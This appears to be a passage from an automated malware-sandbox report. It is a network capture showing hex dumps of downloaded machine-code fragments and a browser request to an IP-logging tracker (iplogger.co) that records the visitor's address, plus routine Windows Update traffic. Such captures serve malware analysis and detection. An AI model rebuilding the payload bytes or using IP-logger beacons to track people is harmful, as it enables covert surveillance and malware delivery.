                            2024-07-08 08:09:26 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 27 55 48 89 e5 48 83 ec 18 48 8b 48 08 48 39 4b 08 74 04 31 c0 eb 0b 48 8b 00 48 8b 1b e8 f9 f0 ff ff 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 a4 03 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb b8 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 2d 55 48 89 e5 48 83 ec 18 48 8b 10 48 39 13 74 04 31 c0 eb 13 48 8b 70 08 48 8b 4b 08 48 89 d0 48 89 f3 e8 53 01 00 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 0f 1f 00 e8 3b 03 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb af cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 2d 55 48 89 e5 48 83 ec 18 48 8b 10 48 39 13 74 04 31 c0 eb 13 48 8b 70 08 48 8b 4b 08 48 89 d0 48 89 f3 e8 33 00 00 00 48 83
                            Data Ascii: I;fv'UHHHHH9Kt1HHH]HD$H\$HD$H\$I;fv-UHHHH9t1HpHKHHSH]HD$H\$;HD$H\$I;fv-UHHHH9t1HpHKHH3H
                            2024-07-08 08:09:26 UTC1024INData Raw: 00 00 4d 8d 60 ec 4d 89 e7 49 c1 fc 3f 4d 21 e0 49 f7 df 48 39 d6 73 45 4c 89 7c 24 50 4c 89 84 24 80 00 00 00 4c 89 6c 24 78 48 89 f8 48 89 d3 48 89 f1 4c 89 ff 48 8d 35 93 27 36 00 e8 ce 34 04 00 4c 8b 84 24 80 00 00 00 4c 8b 6c 24 78 4c 8b 7c 24 50 48 89 c7 48 89 da 48 89 ce 48 89 54 24 68 48 89 74 24 70 48 89 bc 24 38 01 00 00 4a 8d 04 2f 4a 8d 9c 04 b8 00 00 00 4c 89 f9 e8 2d f0 05 00 48 8b 84 24 90 00 00 00 0f b6 4c 24 47 48 8b 9c 24 98 00 00 00 4c 8b 4c 24 60 4c 8b 94 24 30 01 00 00 4c 8b 9c 24 88 00 00 00 48 8b 74 24 70 4c 8b 44 24 68 48 8b bc 24 38 01 00 00 e9 62 fd ff ff 4c 89 c0 b9 14 00 00 00 0f 1f 40 00 e8 fb e5 05 00 4c 89 c0 b9 14 00 00 00 e8 ee e5 05 00 4c 89 d8 4c 89 c9 e8 e3 e5 05 00 48 89 d0 4c 89 c9 e8 d8 e5 05 00 b8 08 00 00 00 48 89
                            Data Ascii: M`MI?M!IH9sEL|$PL$Ll$xHHHLH5'64L$Ll$xL|$PHHHHT$hHt$pH$8J/JL-H$L$GH$LL$`L$0L$Ht$pLD$hH$8bL@LLLHLH
                            2024-07-08 08:09:26 UTC16384INData Raw: c5 8f 75 3b 48 8d 0d 85 24 36 00 0f 1f 44 00 00 48 39 c8 0f 85 43 02 00 00 48 8b 03 48 89 44 24 48 e8 6a 03 03 00 48 8b 44 24 48 0f 1f 44 00 00 e8 1b 09 03 00 e8 b6 03 03 00 e9 3f 02 00 00 81 f9 94 2d 59 93 0f 85 11 02 00 00 48 8d 0d 7e 21 36 00 48 39 c8 0f 85 01 02 00 00 f2 0f 10 03 f2 0f 11 44 24 38 e8 26 03 03 00 f2 0f 10 44 24 38 e8 fb 05 03 00 e8 76 03 03 00 e9 ff 01 00 00 81 f9 79 89 73 95 75 38 48 8d 0d 42 23 36 00 66 90 48 39 c8 0f 85 c3 01 00 00 0f b6 03 48 89 44 24 68 e8 ea 02 03 00 48 8b 44 24 68 0f 1f 44 00 00 e8 9b 08 03 00 e8 36 03 03 00 e9 bf 01 00 00 81 f9 43 dd d6 99 0f 85 91 01 00 00 48 8d 0d fe 21 36 00 48 39 c8 0f 85 81 01 00 00 48 8b 03 48 89 44 24 58 e8 a8 02 03 00 48 8b 44 24 58 0f 1f 00 e8 3b 09 03 00 e8 f6 02 03 00 e9 7f 01 00 00
                            Data Ascii: u;H$6DH9CHHD$HjHD$HD?-YH~!6H9D$8&D$8vysu8HB#6fH9HD$hHD$hD6CH!6H9HHD$XHD$X;
                            2024-07-08 08:09:26 UTC1024INData Raw: 8d 92 98 01 01 00 48 8b 12 48 85 d2 74 e4 90 90 eb e0 48 83 c4 08 5d c3 48 89 44 24 08 e8 ce 7f 05 00 48 8b 44 24 08 e9 64 ff ff ff cc cc cc cc 49 3b 66 10 0f 86 ce 01 00 00 55 48 89 e5 48 83 ec 38 84 00 0f b6 d3 66 0f 1f 84 00 00 00 00 00 48 81 fa 88 00 00 00 0f 83 9d 01 00 00 48 89 54 24 30 88 5c 24 50 48 89 44 24 48 48 8b 4c d0 28 48 89 4c 24 28 48 89 c8 e8 53 6f 00 00 48 8b 4c 24 28 48 8b 51 38 48 39 d0 75 54 48 89 54 24 20 0f b7 49 68 48 39 ca 0f 85 fa 00 00 00 48 89 44 24 18 48 8b 44 24 48 0f b6 5c 24 50 0f 1f 40 00 e8 fb 8e 00 00 48 8b 4c 24 30 48 8b 54 24 48 48 8b 44 ca 28 48 89 44 24 28 e8 02 6f 00 00 48 8b 54 24 20 48 8b 5c 24 18 48 8b 4c 24 28 eb 03 48 89 c3 48 39 41 38 0f 86 9a 00 00 00 48 8b 71 70 48 0f af c6 0f b7 71 68 ff c6 0f b7 fe 48 03
                            Data Ascii: HHtH]HD$HD$dI;fUHH8fHHT$0\$PHD$HHL(HL$(HSoHL$(HQ8H9uTHT$ IhH9HD$HD$H\$P@HL$0HT$HHD(HD$(oHT$ H\$HL$(HH9A8HqpHqhH
                            2024-07-08 08:09:26 UTC16384INData Raw: ff 42 20 c7 81 c0 00 00 00 00 00 00 00 8b 91 d8 00 00 00 8d 5a ff 90 89 99 d8 00 00 00 83 fa 01 75 12 41 80 be b1 00 00 00 00 74 08 49 c7 46 10 de fa ff ff 48 83 c4 58 5d c3 4c 8b 42 50 4d 8b 48 40 4d 0f bc d1 41 bb 40 00 00 00 4d 0f 44 d3 49 83 fa 40 7d 69 4d 8b 58 30 4f 8d 24 13 4d 8b 68 38 4d 39 e5 76 58 4f 8d 1c 13 4d 8d 5b 01 90 49 f7 c3 3f 00 00 00 75 0d 4d 39 dd 74 08 49 89 cd 45 31 c9 eb 3f 49 ff c2 49 89 cd 4c 89 d1 49 d3 e9 48 83 f9 40 4d 19 d2 4d 21 d1 4d 89 48 40 4d 89 58 30 45 0f b7 48 68 41 ff c1 66 45 89 48 68 4d 8b 48 70 4d 0f af cc 4d 03 48 18 eb 06 49 89 cd 45 31 c9 4d 85 c9 74 04 31 c9 eb 31 48 89 d0 bb 05 00 00 00 e8 55 fb ff ff 48 8b 54 24 30 0f b6 74 24 26 48 8b 7c 24 70 4c 8b 6c 24 40 49 89 c1 49 89 d8 48 8b 44 24 50 48 8b 5c 24 68
                            Data Ascii: B ZuAtIFHX]LBPMH@MA@MDI@}iMX0O$Mh8M9vXOM[I?uM9tIE1?IILIH@MM!MH@MX0EHhAfEHhMHpMMHIE1Mt11HUHT$0t$&H|$pLl$@IIHD$PH\$h
                            2024-07-08 08:09:26 UTC1024INData Raw: fe 03 0f 82 9c 00 00 00 44 0f 11 7c 24 58 44 0f 11 7c 24 68 44 0f 11 7c 24 78 44 0f 11 bc 24 88 00 00 00 0f b7 70 52 48 0f af f2 48 03 73 10 4c 8d 56 08 4c 8d 5e 28 48 89 74 24 58 4c 89 54 24 68 4c 89 5c 24 70 0f b6 73 08 66 0f 1f 44 00 00 40 f6 c6 08 75 2e 49 8d 34 11 44 0f b7 50 52 49 0f af f2 48 03 73 10 4c 8d 56 08 4c 8d 5e 28 48 89 74 24 78 4c 89 94 24 88 00 00 00 4c 89 9c 24 90 00 00 00 48 89 54 24 30 88 4c 24 1f 4c 89 4c 24 20 48 89 9c 24 b0 00 00 00 48 89 84 24 a8 00 00 00 eb 2f 48 39 53 20 75 11 4c 89 c9 48 89 c2 48 89 d8 48 89 d3 e8 55 f7 ff ff 48 81 c4 98 00 00 00 5d c3 0f b7 70 52 48 8d 34 37 48 8d 76 f8 48 8b 3e 48 85 ff 74 14 48 89 7c 24 50 90 90 48 8d 77 08 4c 8d 57 28 45 31 db eb 66 0f b6 73 08 40 f6 c6 02 75 ae 48 8b 70 40 48 83 7e 08 00
                            Data Ascii: D|$XD|$hD|$xD$pRHHsLVL^(Ht$XLT$hL\$psfD@u.I4DPRIHsLVL^(Ht$xL$L$HT$0L$LL$ H$H$/H9S uLHHHUH]pRH47HvH>HtH|$PHwLW(E1fs@uHp@H~
                            2024-07-08 08:09:26 UTC16384INData Raw: 48 21 c1 49 0f af c8 48 03 4a 10 0f 1f 44 00 00 4d 85 c9 74 27 0f b6 52 08 f6 c2 08 75 03 48 d1 ee 48 21 c6 4c 0f af c6 43 0f b6 14 01 83 c2 fe 4b 8d 1c 01 80 fa 03 72 03 48 89 d9 48 89 f8 eb 1c 48 8d 05 08 11 74 00 48 83 c4 10 5d c3 0f b7 50 52 48 8d 14 11 48 8d 52 f8 48 8b 0a 48 85 c9 74 09 90 48 8d 51 08 31 db eb 14 48 8d 05 de 10 74 00 48 83 c4 10 5d c3 48 ff c3 48 83 c2 08 48 83 fb 08 73 c9 48 8b 32 48 39 74 24 30 75 e9 0f b6 34 0b 40 80 fe 01 76 df 0f b6 50 51 48 0f af d3 48 8d 04 0a 48 8d 40 48 48 83 c4 10 5d c3 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 e8 2d 37 05 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 e9 79 fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 62 01 00 00 55 48 89 e5 48
                            Data Ascii: H!IHJDMt'RuHH!LCKrHHHtH]PRHHRHHtHQ1HtH]HHHsH2H9t$0u4@vPQHHH@HH]HD$H\$HL$-7HD$H\$HL$yI;fbUHH
                            2024-07-08 08:09:26 UTC1024INData Raw: 48 89 ca 48 89 df 49 89 c3 48 8b 44 24 40 48 8b 4c 24 30 48 8b 9c 24 c0 00 00 00 48 d1 e8 4d 89 e1 49 d3 e4 4d 09 e1 4d 8d 24 08 48 d1 e1 66 90 48 83 f8 01 0f 85 69 ff ff ff eb 06 4d 89 e1 4d 89 c4 4c 89 64 24 38 4c 89 4c 24 50 48 89 4c 24 30 eb 52 48 89 44 24 40 4c 89 d8 48 89 fb 4c 89 d7 4c 89 ce 49 89 c8 48 89 d1 e8 21 f7 ff ff 48 8b 54 24 40 48 ff ca 48 8b b4 24 b8 00 00 00 4c 8b 4c 24 50 4c 8b 64 24 38 49 89 c3 49 89 fa 48 89 d0 48 89 ca 48 89 df 48 8b 4c 24 30 48 8b 9c 24 c0 00 00 00 48 83 f8 01 77 a8 4c 89 d8 48 89 fb 48 89 d1 4c 89 d7 4c 89 ce 4d 89 e0 e8 ce f6 ff ff e9 1c fd ff ff e8 a4 06 02 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 e8 0a f7 04 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 71 fa ff ff
                            Data Ascii: HHIHD$@HL$0H$HMIMM$HfHiMMLd$8LL$PHL$0RHD$@LHLLIH!HT$@HH$LL$PLd$8IIHHHHL$0H$HwLHHLLMHD$H\$HL$H|$ HD$H\$HL$H|$ q


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.1249716172.67.167.2494432972C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:26 UTC659OUTGET /1lLub HTTP/1.1
                            Host: iplogger.co
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-07-08 08:09:27 UTC1141INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:27 GMT
                            Content-Type: image/png
                            Transfer-Encoding: chunked
                            Connection: close
                            set-cookie: 54493797137263905=2; expires=Tue, 08 Jul 2025 08:09:27 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                            set-cookie: clhf03028ja=8.46.123.33; expires=Tue, 08 Jul 2025 08:09:27 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                            memory: 0.43221282958984375
                            expires: Mon, 08 Jul 2024 08:09:27 +0000
                            Cache-Control: no-store, no-cache, must-revalidate
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uVYf6R%2BuuiJLTqd51XiMzswFTD29OWiJpclq5DfoQRnUR7bFCzJtFDm8pBgc6%2FD7vp8ExDaW%2FFaDrDwCeM6N7yQ19haJuNMaNYPc1okLZwgmQpvHrhOFHnX2Lp8zzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe97963ea642fb-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-08 08:09:27 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                            Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                            2024-07-08 08:09:27 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.1249721172.67.167.2494432972C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:27 UTC637OUTGET /favicon.ico HTTP/1.1
                            Host: iplogger.co
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://iplogger.co/1lLub
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            Cookie: 54493797137263905=2; clhf03028ja=8.46.123.33
                            2024-07-08 08:09:27 UTC868INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:27 GMT
                            Content-Type: image/x-icon
                            Content-Length: 2833
                            Connection: close
                            last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                            etag: "629f3a26-b11"
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: HIT
                            Age: 4968
                            Accept-Ranges: bytes
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jH6QVtNaBF73eGS2tpuqem1yrAGASXOFKNysUs1OXYDSgeBTil5stVTUPXzm5VCsvKDQKYUoAx%2FlXY56jN0cgWaq0XnjI0ROzdWSYDeAxl65IrJ5JYHBZKqfNCtCgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe979cfaa40c8a-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-08 08:09:27 UTC501INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                            Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                            2024-07-08 08:09:27 UTC1369INData Raw: 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc cb 7c 07 f1 f6 ae 40 dc e4 4f 00 9f 05 8e a7 22 6a 65 e0 90 a1 6f 47 4c a0 1b 31 ec 00 9e 8c e5 f4 e7 52 21 35 5c eb a6 9a 51 87 37 9d 0f 01 7f c1 04 2e 4d 62 02 78 1e 78 04 d8 05 1c 29 45 83 75 09 62 39 ed 41 64 f9 3c a0 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e
                            Data Ascii: _Vc&rzM9BdJp|@O"jeoGL1R!5\Q7.Mbxx)Eub9Ad<x8L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~
                            2024-07-08 08:09:27 UTC963INData Raw: 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e f3 f3 0e 70 03 b0 b3 3f a0 ca 00 b1 9c 3e 09 29 f2 9e 5c 35 c6 86 54 48 cd 7a 02 40 7a 80 6c cd da c5 c0 ad 46 1f ec 07 c2 08 97 5b 89 32 f0 03 60 a3 59 7c 07 f0 24 d3 3d bf e3 11 e6 3f 99 2c e8 95 c9 82 26 15 52 bb 81 53 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df
                            Data Ascii: 4 iG6p,RY3dA/F0p?>)\5THz@zlF[2`Y|$=?,&RS]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]o


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.1249725172.67.167.2494432972C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:28 UTC400OUTGET /favicon.ico HTTP/1.1
                            Host: iplogger.co
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            Cookie: 54493797137263905=2; clhf03028ja=8.46.123.33
                            2024-07-08 08:09:28 UTC872INHTTP/1.1 200 OK
                            Date: Mon, 08 Jul 2024 08:09:28 GMT
                            Content-Type: image/x-icon
                            Content-Length: 2833
                            Connection: close
                            last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                            etag: "629f3a26-b11"
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            Cache-Control: max-age=14400
                            CF-Cache-Status: HIT
                            Age: 4969
                            Accept-Ranges: bytes
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wDmb9Z4GhGLuBtlTdyFkWIooU3c9Ubq5kVzAu6sgzjAS%2B1PP9Hjg1WoRM3VXHQcmqXJGnDcB3AINlLcTXwBYTGe%2BSsBObVkIpJvrPwbi7VH%2Fo5e6jsZeTW0DkUBETQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 89fe97a18ae6c436-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-07-08 08:09:28 UTC497INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                            Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                            2024-07-08 08:09:28 UTC1369INData Raw: 97 01 c6 be 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc cb 7c 07 f1 f6 ae 40 dc e4 4f 00 9f 05 8e a7 22 6a 65 e0 90 a1 6f 47 4c a0 1b 31 ec 00 9e 8c e5 f4 e7 52 21 35 5c eb a6 9a 51 87 37 9d 0f 01 7f c1 04 2e 4d 62 02 78 1e 78 04 d8 05 1c 29 45 83 75 09 62 39 ed 41 64 f9 3c a0 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94
                            Data Ascii: _Vc&rzM9BdJp|@O"jeoGL1R!5\Q7.Mbxx)Eub9Ad<x8L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<
                            2024-07-08 08:09:28 UTC967INData Raw: 85 0e 7c b8 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e f3 f3 0e 70 03 b0 b3 3f a0 ca 00 b1 9c 3e 09 29 f2 9e 5c 35 c6 86 54 48 cd 7a 02 40 7a 80 6c cd da c5 c0 ad 46 1f ec 07 c2 08 97 5b 89 32 f0 03 60 a3 59 7c 07 f0 24 d3 3d bf e3 11 e6 3f 99 2c e8 95 c9 82 26 15 52 bb 81 53 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d
                            Data Ascii: |4 iG6p,RY3dA/F0p?>)\5THz@zlF[2`Y|$=?,&RS]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.124972020.114.59.183443
                            TimestampBytes transferredDirectionData
                            2024-07-08 08:09:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XfbLx43C7hcaUE4&MD=R3sXdF5e HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                            Host: slscr.update.microsoft.com
                            2024-07-08 08:09:28 UTC560INHTTP/1.1 200 OK
                            Cache-Control: no-cache
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            Expires: -1
                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                            MS-CorrelationId: 9944c5da-eb26-41d8-a5f4-af834f297bda
                            MS-RequestId: 71fde93e-1e7b-4894-8adf-aee26d632c73
                            MS-CV: jAqL9NDuOkaojEwr.0
                            X-Microsoft-SLSClientCache: 2880
                            Content-Disposition: attachment; filename=environment.cab
                            X-Content-Type-Options: nosniff
                            Date: Mon, 08 Jul 2024 08:09:28 GMT
                            Connection: close
                            Content-Length: 24490
